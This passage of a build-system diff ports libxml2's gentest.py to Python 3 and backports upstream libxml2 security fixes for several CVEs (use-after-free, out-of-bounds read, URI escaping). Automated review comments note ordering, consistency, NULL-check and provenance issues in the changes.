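+ if define == 1:
+- test.write("#endif\n\n")
++ test.write("#endif\n\n")
+ add_generated_param_type(name)
+
+ #
+@@ -445,7 +445,7 @@ known_return_types = []
+ def is_known_return_type(name):
+ for type in known_return_types:
+ if type == name:
+- return 1
++ return 1
+ return 0
+
+ #
+@@ -471,7 +471,7 @@ def compare_and_save():
+ try:
+ os.system("rm testapi.c; mv testapi.c.new testapi.c")
+ except:
+- os.system("mv testapi.c.new testapi.c")
++ os.system("mv testapi.c.new testapi.c")
+ print("Updated testapi.c")
+ else:
+ print("Generated testapi.c is identical")
+@@ -481,17 +481,17 @@ while line != "":
+ if line == "/* CUT HERE: everything below that line is generated */\n":
+ break;
+ if line[0:15] == "#define gen_nb_":
+- type = string.split(line[15:])[0]
+- known_param_types.append(type)
++ type = line[15:].split()[0]
++ known_param_types.append(type)
+ if line[0:19] == "static void desret_":
+- type = string.split(line[19:], '(')[0]
+- known_return_types.append(type)
++ type = line[19:].split('(')[0]
++ known_return_types.append(type)
+ test.write(line)
+ line = input.readline()
+ input.close()
+
+ if line == "":
+- print "Could not find the CUT marker in testapi.c skipping generation"
++ print("Could not find the CUT marker in testapi.c skipping generation")
+ test.close()
+ sys.exit(0)
+
+@@ -505,7 +505,7 @@ test.write("/* CUT HERE: everything below that line is generated */\n")
+ #
+ doc = libxml2.readFile(srcPref + 'doc/libxml2-api.xml', None, 0)
+ if doc == None:
+- print "Failed to load doc/libxml2-api.xml"
++ print("Failed to load doc/libxml2-api.xml")
+ sys.exit(1)
+ ctxt = doc.xpathNewContext()
+
+@@ -519,9 +519,9 @@ for arg in args:
+ mod = arg.xpathEval('string(../@file)')
+ func = arg.xpathEval('string(../@name)')
+ if (mod not in skipped_modules) and (func not in skipped_functions):
+- type = arg.xpathEval('string(@type)')
+- if not argtypes.has_key(type):
+- argtypes[type] = func
++ type = arg.xpathEval('string(@type)')
++ if type not in argtypes:
++ argtypes[type] = func
+
+ # similarly for return types
+ rettypes = {}
+@@ -531,8 +531,8 @@ for ret in rets:
+ func = ret.xpathEval('string(../@name)')
+ if (mod not in skipped_modules) and (func not in skipped_functions):
+ type = ret.xpathEval('string(@type)')
+- if not rettypes.has_key(type):
+- rettypes[type] = func
++ if type not in rettypes:
++ rettypes[type] = func
+
+ #
+ # Generate constructors and return type handling for all enums
+@@ -549,49 +549,49 @@ for enum in enums:
+ continue;
+ define = 0
+
+- if argtypes.has_key(name) and is_known_param_type(name) == 0:
+- values = ctxt.xpathEval("/api/symbols/enum[@type='%s']" % name)
+- i = 0
+- vals = []
+- for value in values:
+- vname = value.xpathEval('string(@name)')
+- if vname == None:
+- continue;
+- i = i + 1
+- if i >= 5:
+- break;
+- vals.append(vname)
+- if vals == []:
+- print "Didn't find any value for enum %s" % (name)
+- continue
+- if modules_defines.has_key(module):
+- test.write("#ifdef %s\n" % (modules_defines[module]))
+- define = 1
+- test.write("#define gen_nb_%s %d\n" % (name, len(vals)))
+- test.write("""static %s gen_%s(int no, int nr ATTRIBUTE_UNUSED) {\n""" %
+- (name, name))
+- i = 1
+- for value in vals:
+- test.write(" if (no == %d) return(%s);\n" % (i, value))
+- i = i + 1
+- test.write(""" return(0);
++ if (name in argtypes) and is_known_param_type(name) == 0:
++ values = ctxt.xpathEval("/api/symbols/enum[@type='%s']" % name)
++ i = 0
++ vals = []
++ for value in values:
++ vname = value.xpathEval('string(@name)')
++ if vname == None:
++ continue;
++ i = i + 1
++ if i >= 5:
++ break;
++ vals.append(vname)
++ if vals == []:
++ print("Didn't find any value for enum %s" % (name))
++ continue
++ if module in modules_defines:
++ test.write("#ifdef %s\n" % (modules_defines[module]))
++ define = 1
++ test.write("#define gen_nb_%s %d\n" % (name, len(vals)))
++ test.write("""static %s gen_%s(int no, int nr ATTRIBUTE_UNUSED) {\n""" %
++ (name, name))
++ i = 1
++ for value in vals:
++ test.write(" if (no == %d) return(%s);\n" % (i, value))
++ i = i + 1
++ test.write(""" return(0);
+ }
+
+ static void des_%s(int no ATTRIBUTE_UNUSED, %s val ATTRIBUTE_UNUSED, int nr ATTRIBUTE_UNUSED) {
+ }
+
+ """ % (name, name));
+- known_param_types.append(name)
++ known_param_types.append(name)
+
+ if (is_known_return_type(name) == 0) and (name in rettypes):
+- if define == 0 and modules_defines.has_key(module):
+- test.write("#ifdef %s\n" % (modules_defines[module]))
+- define = 1
++ if define == 0 and (module in modules_defines):
++ test.write("#ifdef %s\n" % (modules_defines[module]))
++ define = 1
+ test.write("""static void desret_%s(%s val ATTRIBUTE_UNUSED) {
+ }
+
+ """ % (name, name))
+- known_return_types.append(name)
++ known_return_types.append(name)
+ if define == 1:
+ test.write("#endif\n\n")
+
+@@ -615,9 +615,9 @@ for file in headers:
+ # do not test deprecated APIs
+ #
+ desc = file.xpathEval('string(description)')
+- if string.find(desc, 'DEPRECATED') != -1:
+- print "Skipping deprecated interface %s" % name
+- continue;
++ if desc.find('DEPRECATED') != -1:
++ print("Skipping deprecated interface %s" % name)
++ continue;
+
+ test.write("#include <libxml/%s.h>\n" % name)
+ modules.append(name)
+@@ -679,7 +679,7 @@ def generate_test(module, node):
+ # and store the informations for the generation
+ #
+ try:
+- args = node.xpathEval("arg")
++ args = node.xpathEval("arg")
+ except:
+ args = []
+ t_args = []
+@@ -687,37 +687,37 @@ def generate_test(module, node):
+ for arg in args:
+ n = n + 1
+ rtype = arg.xpathEval("string(@type)")
+- if rtype == 'void':
+- break;
+- info = arg.xpathEval("string(@info)")
+- nam = arg.xpathEval("string(@name)")
++ if rtype == 'void':
++ break;
++ info = arg.xpathEval("string(@info)")
++ nam = arg.xpathEval("string(@name)")
+ type = type_convert(rtype, nam, info, module, name, n)
+- if is_known_param_type(type) == 0:
+- add_missing_type(type, name);
+- no_gen = 1
++ if is_known_param_type(type) == 0:
++ add_missing_type(type, name);
++ no_gen = 1
+ if (type[-3:] == 'Ptr' or type[-4:] == '_ptr') and \
+- rtype[0:6] == 'const ':
+- crtype = rtype[6:]
+- else:
+- crtype = rtype
+- t_args.append((nam, type, rtype, crtype, info))
++ rtype[0:6] == 'const ':
++ crtype = rtype[6:]
++ else:
++ crtype = rtype
++ t_args.append((nam, type, rtype, crtype, info))
+
+ try:
+- rets = node.xpathEval("return")
++ rets = node.xpathEval("return")
+ except:
+ rets = []
+ t_ret = None
+ for ret in rets:
+ rtype = ret.xpathEval("string(@type)")
+- info = ret.xpathEval("string(@info)")
++ info = ret.xpathEval("string(@info)")
+ type = type_convert(rtype, 'return', info, module, name, 0)
+- if rtype == 'void':
+- break
+- if is_known_return_type(type) == 0:
+- add_missing_type(type, name);
+- no_gen = 1
+- t_ret = (type, rtype, info)
+- break
++ if rtype == 'void':
++ break
++ if is_known_return_type(type) == 0:
++ add_missing_type(type, name);
++ no_gen = 1
++ t_ret = (type, rtype, info)
++ break
+
+ if no_gen == 0:
+ for t_arg in t_args:
+@@ -733,7 +733,7 @@ test_%s(void) {
+
+ if no_gen == 1:
+ add_missing_functions(name, module)
+- test.write("""
++ test.write("""
+ /* missing type support */
+ return(test_ret);
+ }
+@@ -742,22 +742,22 @@ test_%s(void) {
+ return
+
+ try:
+- conds = node.xpathEval("cond")
+- for cond in conds:
+- test.write("#if %s\n" % (cond.get_content()))
+- nb_cond = nb_cond + 1
++ conds = node.xpathEval("cond")
++ for cond in conds:
++ test.write("#if %s\n" % (cond.get_content()))
++ nb_cond = nb_cond + 1
+ except:
+ pass
+
+ define = 0
+- if function_defines.has_key(name):
++ if name in function_defines:
+ test.write("#ifdef %s\n" % (function_defines[name]))
+- define = 1
++ define = 1
+
+ # Declare the memory usage counter
+ no_mem = is_skipped_memcheck(name)
+ if no_mem == 0:
+- test.write(" int mem_base;\n");
++ test.write(" int mem_base;\n");
+
+ # Declare the return value
+ if t_ret != None:
+@@ -766,29 +766,29 @@ test_%s(void) {
+ # Declare the arguments
+ for arg in t_args:
+ (nam, type, rtype, crtype, info) = arg;
+- # add declaration
+- test.write(" %s %s; /* %s */\n" % (crtype, nam, info))
+- test.write(" int n_%s;\n" % (nam))
++ # add declaration
++ test.write(" %s %s; /* %s */\n" % (crtype, nam, info))
++ test.write(" int n_%s;\n" % (nam))
+ test.write("\n")
+
+ # Cascade loop on of each argument list of values
+ for arg in t_args:
+ (nam, type, rtype, crtype, info) = arg;
+- #
+- test.write(" for (n_%s = 0;n_%s < gen_nb_%s;n_%s++) {\n" % (
+- nam, nam, type, nam))
++ #
++ test.write(" for (n_%s = 0;n_%s < gen_nb_%s;n_%s++) {\n" % (
++ nam, nam, type, nam))
+
+ # log the memory usage
+ if no_mem == 0:
+- test.write(" mem_base = xmlMemBlocks();\n");
++ test.write(" mem_base = xmlMemBlocks();\n");
+
+ # prepare the call
+ i = 0;
+ for arg in t_args:
+ (nam, type, rtype, crtype, info) = arg;
+- #
+- test.write(" %s = gen_%s(n_%s, %d);\n" % (nam, type, nam, i))
+- i = i + 1;
++ #
++ test.write(" %s = gen_%s(n_%s, %d);\n" % (nam, type, nam, i))
++ i = i + 1;
+
+ # add checks to avoid out-of-bounds array access
+ i = 0;
+@@ -797,7 +797,7 @@ test_%s(void) {
+ # assume that "size", "len", and "start" parameters apply to either
+ # the nearest preceding or following char pointer
+ if type == "int" and (nam == "size" or nam == "len" or nam == "start"):
+- for j in range(i - 1, -1, -1) + range(i + 1, len(t_args)):
++ for j in (*range(i - 1, -1, -1), *range(i + 1, len(t_args))):
+ (bnam, btype) = t_args[j][:2]
+ if btype == "const_char_ptr" or btype == "const_xmlChar_ptr":
+ test.write(
+@@ -806,42 +806,42 @@ test_%s(void) {
+ " continue;\n"
+ % (bnam, nam, bnam))
+ break
+- i = i + 1;
++ i = i + 1;
+
+ # do the call, and clanup the result
+- if extra_pre_call.has_key(name):
+- test.write(" %s\n"% (extra_pre_call[name]))
++ if name in extra_pre_call:
++ test.write(" %s\n"% (extra_pre_call[name]))
+ if t_ret != None:
+- test.write("\n ret_val = %s(" % (name))
+- need = 0
+- for arg in t_args:
+- (nam, type, rtype, crtype, info) = arg
+- if need:
+- test.write(", ")
+- else:
+- need = 1
+- if rtype != crtype:
+- test.write("(%s)" % rtype)
+- test.write("%s" % nam);
+- test.write(");\n")
+- if extra_post_call.has_key(name):
+- test.write(" %s\n"% (extra_post_call[name]))
+- test.write(" desret_%s(ret_val);\n" % t_ret[0])
++ test.write("\n ret_val = %s(" % (name))
++ need = 0
++ for arg in t_args:
++ (nam, type, rtype, crtype, info) = arg
++ if need:
++ test.write(", ")
++ else:
++ need = 1
++ if rtype != crtype:
++ test.write("(%s)" % rtype)
++ test.write("%s" % nam);
++ test.write(");\n")
++ if name in extra_post_call:
++ test.write(" %s\n"% (extra_post_call[name]))
++ test.write(" desret_%s(ret_val);\n" % t_ret[0])
+ else:
+- test.write("\n %s(" % (name));
+- need = 0;
+- for arg in t_args:
+- (nam, type, rtype, crtype, info) = arg;
+- if need:
+- test.write(", ")
+- else:
+- need = 1
+- if rtype != crtype:
+- test.write("(%s)" % rtype)
+- test.write("%s" % nam)
+- test.write(");\n")
+- if extra_post_call.has_key(name):
+- test.write(" %s\n"% (extra_post_call[name]))
++ test.write("\n %s(" % (name));
++ need = 0;
++ for arg in t_args:
++ (nam, type, rtype, crtype, info) = arg;
++ if need:
++ test.write(", ")
++ else:
++ need = 1
++ if rtype != crtype:
++ test.write("(%s)" % rtype)
++ test.write("%s" % nam)
++ test.write(");\n")
++ if name in extra_post_call:
++ test.write(" %s\n"% (extra_post_call[name]))
+
+ test.write(" call_tests++;\n");
+
+@@ -849,32 +849,32 @@ test_%s(void) {
+ i = 0;
+ for arg in t_args:
+ (nam, type, rtype, crtype, info) = arg;
+- # This is a hack to prevent generating a destructor for the
+- # 'input' argument in xmlTextReaderSetup. There should be
+- # a better, more generic way to do this!
+- if string.find(info, 'destroy') == -1:
+- test.write(" des_%s(n_%s, " % (type, nam))
+- if rtype != crtype:
+- test.write("(%s)" % rtype)
+- test.write("%s, %d);\n" % (nam, i))
+- i = i + 1;
++ # This is a hack to prevent generating a destructor for the
++ # 'input' argument in xmlTextReaderSetup. There should be
++ # a better, more generic way to do this!
++ if info.find('destroy') == -1:
++ test.write(" des_%s(n_%s, " % (type, nam))
++ if rtype != crtype:
++ test.write("(%s)" % rtype)
++ test.write("%s, %d);\n" % (nam, i))
++ i = i + 1;
+
+ test.write(" xmlResetLastError();\n");
+ # Check the memory usage
+ if no_mem == 0:
+- test.write(""" if (mem_base != xmlMemBlocks()) {
++ test.write(""" if (mem_base != xmlMemBlocks()) {
+ printf("Leak of %%d blocks found in %s",
+- xmlMemBlocks() - mem_base);
+- test_ret++;
++\t xmlMemBlocks() - mem_base);
++\t test_ret++;
+ """ % (name));
+- for arg in t_args:
+- (nam, type, rtype, crtype, info) = arg;
+- test.write(""" printf(" %%d", n_%s);\n""" % (nam))
+- test.write(""" printf("\\n");\n""")
+- test.write(" }\n")
++ for arg in t_args:
++ (nam, type, rtype, crtype, info) = arg;
++ test.write(""" printf(" %%d", n_%s);\n""" % (nam))
++ test.write(""" printf("\\n");\n""")
++ test.write(" }\n")
+
+ for arg in t_args:
+- test.write(" }\n")
++ test.write(" }\n")
+
+ test.write(" function_tests++;\n")
+ #
+@@ -882,7 +882,7 @@ test_%s(void) {
+ #
+ while nb_cond > 0:
+ test.write("#endif\n")
+- nb_cond = nb_cond -1
++ nb_cond = nb_cond -1
+ if define == 1:
+ test.write("#endif\n")
+
+@@ -900,10 +900,10 @@ test_%s(void) {
+ for module in modules:
+ # gather all the functions exported by that module
+ try:
+- functions = ctxt.xpathEval("/api/symbols/function[@file='%s']" % (module))
++ functions = ctxt.xpathEval("/api/symbols/function[@file='%s']" % (module))
+ except:
+- print "Failed to gather functions from module %s" % (module)
+- continue;
++ print("Failed to gather functions from module %s" % (module))
++ continue;
+
+ # iterate over all functions in the module generating the test
+ i = 0
+@@ -923,14 +923,14 @@ test_%s(void) {
+ # iterate over all functions in the module generating the call
+ for function in functions:
+ name = function.xpathEval('string(@name)')
+- if is_skipped_function(name):
+- continue
+- test.write(" test_ret += test_%s();\n" % (name))
++ if is_skipped_function(name):
++ continue
++ test.write(" test_ret += test_%s();\n" % (name))
+
+ # footer
+ test.write("""
+ if (test_ret != 0)
+- printf("Module %s: %%d errors\\n", test_ret);
++\tprintf("Module %s: %%d errors\\n", test_ret);
+ return(test_ret);
+ }
+ """ % (module))
+@@ -948,7 +948,7 @@ test.write(""" return(0);
+ }
+ """);
+
+-print "Generated test for %d modules and %d functions" %(len(modules), nb_tests)
++print("Generated test for %d modules and %d functions" %(len(modules), nb_tests))
+
+ compare_and_save()
+
+@@ -960,11 +960,8 @@ for missing in missing_types.keys():
+ n = len(missing_types[missing])
+ missing_list.append((n, missing))
+
+-def compare_missing(a, b):
+- return b[0] - a[0]
+-
+-missing_list.sort(compare_missing)
+-print "Missing support for %d functions and %d types see missing.lst" % (missing_functions_nr, len(missing_list))
++missing_list.sort(key=lambda a: a[0])
++print("Missing support for %d functions and %d types see missing.lst" % (missing_functions_nr, len(missing_list)))
+ lst = open("missing.lst", "w")
+ lst.write("Missing support for %d types" % (len(missing_list)))
+ lst.write("\n")
+@@ -974,9 +971,9 @@ for miss in missing_list:
+ for n in missing_types[miss[1]]:
+ i = i + 1
+ if i > 5:
+- lst.write(" ...")
+- break
+- lst.write(" %s" % (n))
++ lst.write(" ...")
++ break
++ lst.write(" %s" % (n))
+ lst.write("\n")
+ lst.write("\n")
+ lst.write("\n")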
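Review bot: The replacement sort in the `@@ -960,11 +960,8 @@` hunk of gentest.py reverses the ordering of `missing_list`. The removed `compare_missing` returned `b[0] - a[0]`, which sorts the (count, type) tuples by descending count, while `missing_list.sort(key=lambda a: a[0])` sorts ascending. To keep the old order the line should read `missing_list.sort(key=lambda a: a[0], reverse=True)`. From the visible lines this only affects the order in which types are written to missing.lst, not the generated testapi.c.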
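--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2016-3709.patch
@@ -0,0 +1,89 @@
+From c1ba6f54d32b707ca6d91cb3257ce9de82876b6f Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Sat, 15 Aug 2020 18:32:29 +0200
+Subject: [PATCH] Revert "Do not URI escape in server side includes"
+
+This reverts commit 960f0e275616cadc29671a218d7fb9b69eb35588.
+
+This commit introduced
+
+- an infinite loop, found by OSS-Fuzz, which could be easily fixed.
+- an algorithm with quadratic runtime
+- a security issue, see
+ https://bugzilla.gnome.org/show_bug.cgi?id=769760
+
+A better approach is to add an option not to escape URLs at all
+which libxml2 should have possibly done in the first place.
+
+CVE: CVE-2016-3709
+Upstream-Status: Backport [https://github.com/GNOME/libxml2/commit/c1ba6f54d32b707ca6d91cb3257ce9de82876b6f]
+Signed-off-by: Pawan Badganchi <Pawan.Badganchi@kpit.com>
+---
+ HTMLtree.c | 49 +++++++++++--------------------------------------
+ 1 file changed, 11 insertions(+), 38 deletions(-)
+
+diff --git a/HTMLtree.c b/HTMLtree.c
+index 8d236bb35..cdb7f86a6 100644
+--- a/HTMLtree.c
++++ b/HTMLtree.c
+@@ -706,49 +706,22 @@ htmlAttrDumpOutput(xmlOutputBufferPtr buf, xmlDocPtr doc, xmlAttrPtr cur,
+ (!xmlStrcasecmp(cur->name, BAD_CAST "src")) ||
+ ((!xmlStrcasecmp(cur->name, BAD_CAST "name")) &&
+ (!xmlStrcasecmp(cur->parent->name, BAD_CAST "a"))))) {
++ xmlChar *escaped;
+ xmlChar *tmp = value;
+- /* xmlURIEscapeStr() escapes '"' so it can be safely used. */
+- xmlBufCCat(buf->buffer, "\"");
+
+ while (IS_BLANK_CH(*tmp)) tmp++;
+
+- /* URI Escape everything, except server side includes. */
+- for ( ; ; ) {
+- xmlChar *escaped;
+- xmlChar endChar;
+- xmlChar *end = NULL;
+- xmlChar *start = (xmlChar *)xmlStrstr(tmp, BAD_CAST "<!--");
+- if (start != NULL) {
+- end = (xmlChar *)xmlStrstr(tmp, BAD_CAST "-->");
+- if (end != NULL) {
+- *start = '\0';
+- }
+- }
+-
+- /* Escape the whole string, or until start (set to '\0'). */
+- escaped = xmlURIEscapeStr(tmp, BAD_CAST"@/:=?;#%&,+");
+- if (escaped != NULL) {
+- xmlBufCat(buf->buffer, escaped);
+- xmlFree(escaped);
+- } else {
+- xmlBufCat(buf->buffer, tmp);
+- }
+-
+- if (end == NULL) { /* Everything has been written. */
+- break;
+- }
+-
+- /* Do not escape anything within server side includes. */
+- *start = '<'; /* Restore the first character of "<!--". */
+- end += 3; /* strlen("-->") */
+- endChar = *end;
+- *end = '\0';
+- xmlBufCat(buf->buffer, start);
+- *end = endChar;
+- tmp = end;
++ /*
++ * the < and > have already been escaped at the entity level
++ * And doing so here breaks server side includes
++ */
++ escaped = xmlURIEscapeStr(tmp, BAD_CAST"@/:=?;#%&,+<>");
++ if (escaped != NULL) {
++ xmlBufWriteQuotedString(buf->buffer, escaped);
++ xmlFree(escaped);
++ } else {
++ xmlBufWriteQuotedString(buf->buffer, value);
+ }
+-
+- xmlBufCCat(buf->buffer, "\"");
+ } else {
+ xmlBufWriteQuotedString(buf->buffer, value);
+ }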
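Review bot: The fallback branch of the rewritten block in htmlAttrDumpOutput writes `value`, while the escaped path is built from `tmp`, which has already been advanced past leading blanks. When xmlURIEscapeStr() returns NULL, the attribute is therefore emitted with its leading whitespace intact and without URI escaping, so the two paths produce differently normalised output for the same input. Using `xmlBufWriteQuotedString(buf->buffer, tmp);` in the `else` branch would keep them consistent. The patch is a verbatim upstream backport, so if it stays as is, a one-line comment on the fallback saying it deliberately writes the original `value` would help. The function begins and ends outside the hunk.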
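--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2021-3516.patch
@@ -0,0 +1,35 @@
+From 1358d157d0bd83be1dfe356a69213df9fac0b539 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Wed, 21 Apr 2021 13:23:27 +0200
+Subject: [PATCH] Fix use-after-free with `xmllint --html --push`
+
+Call htmlCtxtUseOptions to make sure that names aren't stored in
+dictionaries.
+
+Note that this issue only affects xmllint using the HTML push parser.
+
+Fixes #230.
+
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/1358d157d0bd83be1dfe356a69213df9fac0b539]
+CVE: CVE-2021-3516
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ xmllint.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/xmllint.c b/xmllint.c
+index 6ca1bf54d..dbef273a8 100644
+--- a/xmllint.c
++++ b/xmllint.c
+@@ -2213,7 +2213,7 @@ static void parseAndPrintFile(char *filename, xmlParserCtxtPtr rectxt) {
+ if (res > 0) {
+ ctxt = htmlCreatePushParserCtxt(NULL, NULL,
+ chars, res, filename, XML_CHAR_ENCODING_NONE);
+- xmlCtxtUseOptions(ctxt, options);
++ htmlCtxtUseOptions(ctxt, options);
+ while ((res = fread(chars, 1, pushsize, f)) > 0) {
+ htmlParseChunk(ctxt, chars, res, 0);
+ }
+--
+GitLab
+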
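Review bot: The `ctxt` returned by htmlCreatePushParserCtxt() is passed straight to the new `htmlCtxtUseOptions(ctxt, options);` call and then to htmlParseChunk() with no NULL check in the visible lines, and the return value of htmlCtxtUseOptions() is discarded. If context creation fails, any later dereference of `ctxt` in parseAndPrintFile would fault, though the rest of the function lies outside the hunk so a check further down cannot be ruled out. A guard such as `if (ctxt == NULL) { /* report the failure and leave this branch */ }` before the options call would make that path explicit.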
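--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2021-3517.patch
@@ -0,0 +1,53 @@
+From bf22713507fe1fc3a2c4b525cf0a88c2dc87a3a2 Mon Sep 17 00:00:00 2001
+From: Joel Hockey <joel.hockey@gmail.com>
+Date: Sun, 16 Aug 2020 17:19:35 -0700
+Subject: [PATCH] Validate UTF8 in xmlEncodeEntities
+
+Code is currently assuming UTF-8 without validating. Truncated UTF-8
+input can cause out-of-bounds array access.
+
+Adds further checks to partial fix in 50f06b3e.
+
+Fixes #178
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/bf22713507fe1fc3a2c4b525cf0a88c2dc87a3a2]
+CVE: CVE-2021-3517
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ entities.c | 16 +++++++++++++++-
+ 1 file changed, 15 insertions(+), 1 deletion(-)
+
+diff --git a/entities.c b/entities.c
+index 37b99a56..1a8f86f0 100644
+--- a/entities.c
++++ b/entities.c
+@@ -704,11 +704,25 @@ xmlEncodeEntitiesInternal(xmlDocPtr doc, const xmlChar *input, int attr) {
+ } else {
+ /*
+ * We assume we have UTF-8 input.
++ * It must match either:
++ * 110xxxxx 10xxxxxx
++ * 1110xxxx 10xxxxxx 10xxxxxx
++ * 11110xxx 10xxxxxx 10xxxxxx 10xxxxxx
++ * That is:
++ * cur[0] is 11xxxxxx
++ * cur[1] is 10xxxxxx
++ * cur[2] is 10xxxxxx if cur[0] is 111xxxxx
++ * cur[3] is 10xxxxxx if cur[0] is 1111xxxx
++ * cur[0] is not 11111xxx
+ */
+ char buf[11], *ptr;
+ int val = 0, l = 1;
+
+- if (*cur < 0xC0) {
++ if (((cur[0] & 0xC0) != 0xC0) ||
++ ((cur[1] & 0xC0) != 0x80) ||
++ (((cur[0] & 0xE0) == 0xE0) && ((cur[2] & 0xC0) != 0x80)) ||
++ (((cur[0] & 0xF0) == 0xF0) && ((cur[3] & 0xC0) != 0x80)) ||
++ (((cur[0] & 0xF8) == 0xF8))) {
+ xmlEntitiesErr(XML_CHECK_NOT_UTF8,
+ "xmlEncodeEntities: input not UTF-8");
+ if (doc != NULL)
+--
+GitLab
+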
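Review bot: The new condition in xmlEncodeEntitiesInternal indexes `cur[1]` through `cur[3]` with no length in sight, and the added comment does not say what keeps those reads in bounds. Its safety rests on `input` being NUL-terminated and on the `||` chain evaluating left to right, so a terminator at `cur[1]` or `cur[2]` fails its `!= 0x80` test before the next byte is read. I would add a line to the comment such as `* Each byte is only read after the previous one matched 10xxxxxx, so a NUL terminator stops the scan.` so that nobody reorders the tests later. The check validates lead and continuation bit patterns only; overlong forms such as 0xC0 0x80 still pass it, and whether they are rejected later cannot be seen from this hunk. The enclosing function starts and ends outside the hunk.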
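--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2021-3518.patch
@@ -0,0 +1,112 @@
+From ac82a514e16eb81b4506e2cba1a1ee45b9f025b5 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Wed, 10 Jun 2020 16:34:52 +0200
+Subject: [PATCH 1/2] Don't recurse into xi:include children in
+ xmlXIncludeDoProcess
+
+Otherwise, nested xi:include nodes might result in a use-after-free
+if XML_PARSE_NOXINCNODE is specified.
+
+Found with libFuzzer and ASan.
+
+Upstream-Status: Backport [from fedora: https://bugzilla.redhat.com/show_bug.cgi?id=1954243]
+
+The upstream patch 752e5f71d7cea2ca5a7e7c0b8f72ed04ce654be4 has been modified,
+as to avoid unnecessary modifications to fallback files.
+
+CVE: CVE-2021-3518
+Signed-off-by: Jasper Orschulko <Jasper.Orschulko@iris-sensing.com>
+---
+ xinclude.c | 24 ++++++++++--------------
+ 1 file changed, 10 insertions(+), 14 deletions(-)
+
+diff --git a/xinclude.c b/xinclude.c
+index ba850fa5..f260c1a7 100644
+--- a/xinclude.c
++++ b/xinclude.c
+@@ -2392,21 +2392,19 @@ xmlXIncludeDoProcess(xmlXIncludeCtxtPtr ctxt, xmlDocPtr doc, xmlNodePtr tree) {
+ * First phase: lookup the elements in the document
+ */
+ cur = tree;
+- if (xmlXIncludeTestNode(ctxt, cur) == 1)
+- xmlXIncludePreProcessNode(ctxt, cur);
+ while ((cur != NULL) && (cur != tree->parent)) {
+ /* TODO: need to work on entities -> stack */
+- if ((cur->children != NULL) &&
+- (cur->children->type != XML_ENTITY_DECL) &&
+- (cur->children->type != XML_XINCLUDE_START) &&
+- (cur->children->type != XML_XINCLUDE_END)) {
+- cur = cur->children;
+- if (xmlXIncludeTestNode(ctxt, cur))
+- xmlXIncludePreProcessNode(ctxt, cur);
+- } else if (cur->next != NULL) {
++ if (xmlXIncludeTestNode(ctxt, cur) == 1) {
++ xmlXIncludePreProcessNode(ctxt, cur);
++ } else if ((cur->children != NULL) &&
++ (cur->children->type != XML_ENTITY_DECL) &&
++ (cur->children->type != XML_XINCLUDE_START) &&
++ (cur->children->type != XML_XINCLUDE_END)) {
++ cur = cur->children;
++ continue;
++ }
++ if (cur->next != NULL) {
+ cur = cur->next;
+- if (xmlXIncludeTestNode(ctxt, cur))
+- xmlXIncludePreProcessNode(ctxt, cur);
+ } else {
+ if (cur == tree)
+ break;
+@@ -2416,8 +2414,6 @@ xmlXIncludeDoProcess(xmlXIncludeCtxtPtr ctxt, xmlDocPtr doc, xmlNodePtr tree) {
+ break; /* do */
+ if (cur->next != NULL) {
+ cur = cur->next;
+- if (xmlXIncludeTestNode(ctxt, cur))
+- xmlXIncludePreProcessNode(ctxt, cur);
+ break; /* do */
+ }
+ } while (cur != NULL);
+--
+2.32.0
+
+
+From 3ad5ac1e39e3cd42f838c1cd27ffd4e9b79e6121 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Thu, 22 Apr 2021 19:26:28 +0200
+Subject: [PATCH 2/2] Fix user-after-free with `xmllint --xinclude --dropdtd`
+
+The --dropdtd option can leave dangling pointers in entity reference
+nodes. Make sure to skip these nodes when processing XIncludes.
+
+This also avoids scanning entity declarations and even modifying
+them inadvertently during XInclude processing.
+
+Move from a block list to an allow list approach to avoid descending
+into other node types that can't contain elements.
+
+Fixes #237.
+Upstream-Status: Backport
+CVE: CVE-2021-3518
+Signed-off-by: Jasper Orschulko <Jasper.Orschulko@iris-sensing.com>
+---
+ xinclude.c | 5 ++---
+ 1 file changed, 2 insertions(+), 3 deletions(-)
+
+diff --git a/xinclude.c b/xinclude.c
+index f260c1a7..d7648529 100644
+--- a/xinclude.c
++++ b/xinclude.c
+@@ -2397,9 +2397,8 @@ xmlXIncludeDoProcess(xmlXIncludeCtxtPtr ctxt, xmlDocPtr doc, xmlNodePtr tree) {
+ if (xmlXIncludeTestNode(ctxt, cur) == 1) {
+ xmlXIncludePreProcessNode(ctxt, cur);
+ } else if ((cur->children != NULL) &&
+- (cur->children->type != XML_ENTITY_DECL) &&
+- (cur->children->type != XML_XINCLUDE_START) &&
+- (cur->children->type != XML_XINCLUDE_END)) {
++ ((cur->type == XML_DOCUMENT_NODE) ||
++ (cur->type == XML_ELEMENT_NODE))) {
+ cur = cur->children;
+ continue;
+ }
+--
+2.32.0
+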
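Review bot: The provenance recorded in this file is hard to verify: the first patch's `From` line carries ac82a514e16eb81b4506e2cba1a1ee45b9f025b5 while its description names upstream commit 752e5f71d7cea2ca5a7e7c0b8f72ed04ce654be4, and the second patch has a bare `Upstream-Status: Backport` with no reference at all. Because patch 1/2 is stated to be modified from upstream, each header should say which commit it was derived from and what was dropped, for example `Upstream-Status: Backport [<upstream commit URL>]` on 2/2. On the code side, the rewritten walk in xmlXIncludeDoProcess no longer descends into a node that matched xmlXIncludeTestNode; a short comment above the `else if`, such as `/* children of an xi:include node are deliberately not scanned */`, would keep that intent visible across later refreshes. The function body starts and ends outside both hunks.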
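--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2021-3537.patch
@@ -0,0 +1,50 @@
+From babe75030c7f64a37826bb3342317134568bef61 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Sat, 1 May 2021 16:53:33 +0200
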